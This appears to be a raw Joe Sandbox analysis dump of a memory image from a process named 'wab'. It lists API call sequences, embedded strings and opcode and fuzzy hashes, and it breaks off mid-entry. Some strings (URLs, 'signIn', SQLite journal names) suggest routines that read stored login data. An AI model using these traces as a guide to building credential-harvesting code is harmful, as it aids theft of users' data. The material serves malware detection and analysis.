                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                              APIs
                                                              • memset.MSVCRT ref: 00407E44
                                                              • memset.MSVCRT ref: 00407E5B
                                                              • _mbscpy.MSVCRT ref: 00407E7E
                                                              • _mbscpy.MSVCRT ref: 00407ED7
                                                              • _mbscpy.MSVCRT ref: 00407EEE
                                                              • _mbscpy.MSVCRT ref: 00407F01
                                                              • wcscpy.MSVCRT ref: 00407F10
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID:
                                                              • API String ID: 59245283-0
                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                              • String ID:
                                                              • API String ID: 3467550082-0
                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                              • memset.MSVCRT ref: 00413ADC
                                                              • memset.MSVCRT ref: 00413AEC
                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                              • memset.MSVCRT ref: 00413BD7
                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID: 3A
                                                              • API String ID: 3300951397-293699754
                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              APIs
                                                              • memset.MSVCRT ref: 00411AF6
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                              • wcscat.MSVCRT ref: 00411B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: AE$.cfg$General$EA
                                                              • API String ID: 776488737-1622828088
                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D8BD
                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                              • memset.MSVCRT ref: 0040D906
                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                              • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageRectSend$Client
                                                              • String ID:
                                                              • API String ID: 2047574939-0
                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                              APIs
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                              • memcpy.MSVCRT ref: 0044A8BF
                                                              • memcpy.MSVCRT ref: 0044A90C
                                                              • memcpy.MSVCRT ref: 0044A988
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                              • memcpy.MSVCRT ref: 0044A9D8
                                                              • memcpy.MSVCRT ref: 0044AA19
                                                              • memcpy.MSVCRT ref: 0044AA4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                              • API String ID: 3510742995-2446657581
                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                              • memset.MSVCRT ref: 00405ABB
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                              • SetFocus.USER32(?), ref: 00405B76
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscat
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 384018552-4153097237
                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT ref: 00405498
                                                              • memcpy.MSVCRT ref: 004054AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              APIs
                                                              Strings
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              • <%s>, xrefs: 004100A6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
